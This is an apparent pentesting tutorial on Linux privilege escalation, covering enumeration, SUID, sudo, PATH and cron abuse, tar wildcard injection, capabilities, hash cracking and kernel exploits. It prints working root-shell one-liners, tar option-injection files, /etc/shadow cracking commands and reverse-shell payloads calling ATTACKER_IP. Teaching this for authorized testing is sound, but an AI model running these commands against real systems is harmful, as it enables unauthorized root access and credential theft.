Privilege escalation is the process of gaining higher-level permissions than originally granted — most commonly going from a low-privilege shell to root. It's a core phase in any pentest after gaining initial access.
System Enumeration
Before attempting any exploit, map out the target. Understand the OS version, running processes, users, network services, and file permissions. This is what separates a methodical pentester from someone just running scripts blindly.
bash — key enumeration commandsuname -a # kernel version and architecture
id # current user and group membership
whoami # current user
cat /etc/passwd # list of all users
ps aux # running processes
netstat -tulpn # open ports and listening services
find / -writable -type f 2>/dev/null # world-writable filesUse automated enumeration scripts like LinPEAS or LinEnum to speed this up — but always understand what they're finding and why it matters.
SUID Exploitation
SUID (Set User ID) is a special file permission that lets a binary run as its owner rather than the user executing it. If a root-owned binary has SUID set and is exploitable, you can get a root shell.
bash — find SUID binariesfind / -perm -4000 -type f 2>/dev/null
Once you have a list, check each binary against GTFOBins — a curated list of Unix binaries that can be abused. Common targets include vim, nmap, python, bash, and find.
# If python has SUID:
python -c 'import os; os.execl("/bin/sh", "sh", "-p")'SUDO Exploitation
Misconfigured sudo rules are one of the most common privesc vectors. If a user can run certain commands as root without a password, those commands can often be abused.
bash — check sudo privilegessudo -l
Look for entries like (ALL) NOPASSWD: /usr/bin/vim. Then check GTFOBins for the allowed binary. Editors, scripting languages, and file utilities are especially dangerous with sudo rights.
Never grant ALL or NOPASSWD without tight restrictions. Even seemingly harmless binaries like less, awk, or env can be exploited.
PATH Hijacking
When a script or binary calls another program using a relative path (e.g., just ls instead of /bin/ls), it searches through directories in $PATH in order. If you can write to a directory that appears earlier in PATH, you can plant a malicious binary with the same name.
# If a SUID script calls "service" without an absolute path:
echo '/bin/bash -p' > /tmp/service
chmod +x /tmp/service
export PATH=/tmp:$PATH
./vulnerable_script # now runs your fake "service"Cronjob Enumeration
Cron jobs run scheduled tasks, often as root. If the script being executed is writable by your user, you can replace its contents and wait for root to run it for you.
bash — enumerate cron jobscat /etc/crontab
ls -la /etc/cron.*
crontab -l # current user's crontab
cat /var/spool/cron/* # other users' crontabs (if readable)Look for scripts owned by root but writable by others, or scripts in world-writable directories. Even if the script itself isn't writable, check if it references other files that are.
Wildcard Expansion Exploitation
Some commands expand wildcards (*) in a way that can be abused. The classic example is tar — if a cron job runs tar czf backup.tar.gz * in a directory you control, you can create files with names that look like tar options.
# Create these files in the target directory:
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > "--checkpoint=1"
# When tar runs with *, it interprets these as options
# Then execute:
/tmp/bash -p # root shellCapabilities Enumeration
Linux capabilities are a fine-grained alternative to SUID — they give a binary specific root powers without full root access. Some capabilities are just as dangerous as SUID and are often overlooked.
bash — find binaries with capabilitiesgetcap -r / 2>/dev/null
Look for cap_setuid+ep — if Python, Perl, or Ruby has this, you can spawn a root shell. Check GTFOBins under the "Capabilities" filter for exploitation methods.
Local Service Exploitation
Services running on localhost (only accessible from the machine itself) are often less hardened than internet-facing services. Look for databases, internal APIs, or admin panels running on non-standard ports.
- Redis with no auth — can write SSH keys or cron jobs as root
- MySQL running as root — can use
SELECT INTO OUTFILEto write files - Writable Docker socket — mount host filesystem and escape container
ss -tulpn
netstat -tulpn 2>/dev/nullUnshadow Attack
If you can read both /etc/passwd and /etc/shadow, you can combine them and attempt to crack password hashes offline — much faster than online brute-forcing.
unshadow /etc/passwd /etc/shadow > unshadowed.txt
# Crack with John the Ripper:
john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
# Or with Hashcat:
hashcat -m 1800 unshadowed.txt rockyou.txtReverse Shell
A reverse shell makes the target machine connect back to you rather than you connecting to it — useful when inbound ports are blocked. After getting a low-priv shell, you can use it to chain further exploitation.
bash — classic reverse shell payload# On attacker machine, start listener:
nc -lvnp 4444
# On target machine, run:
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
# Python alternative:
python3 -c 'import socket,os,pty;s=socket.socket();s.connect(("ATTACKER_IP",4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'Only use reverse shells on systems you own or have explicit authorization to test. Unauthorized access is illegal.
Linux Binary Exploitation
If a locally installed application has a memory corruption vulnerability, you can exploit it to get a root shell. This is more advanced and typically requires understanding of stack layout, calling conventions, and protections like ASLR and NX.
- Buffer Overflow — overwrite the return address to redirect execution
- Format String — use
%nspecifiers to write arbitrary memory - ROP Chains — chain existing code gadgets to bypass NX
Tools: GDB + pwndbg, pwntools (Python), checksec to inspect binary protections, Exploit-DB for existing PoCs.
Kernel Exploitation
Unpatched kernel vulnerabilities can be exploited to go straight from any user to root. These are high-impact but also risky — a bad exploit can crash the system. Identify the exact kernel version first, then search for known CVEs.
bash — identify kernel and find exploitsuname -r # e.g. 4.4.0-116-generic
# Use linux-exploit-suggester:
./linux-exploit-suggester.sh
# Or manually search:
# searchsploit linux kernel 4.4Notable examples: Dirty COW (CVE-2016-5195), OverlayFS (CVE-2015-1328), PwnKit (CVE-2021-4034), DirtyPipe (CVE-2022-0847).
Privilege escalation is mostly about thorough enumeration first. Run LinPEAS, check SUID/capabilities/sudo rules, look for writable cron scripts, and always verify kernel version. The path to root is almost always something simple that was misconfigured — not some 0-day.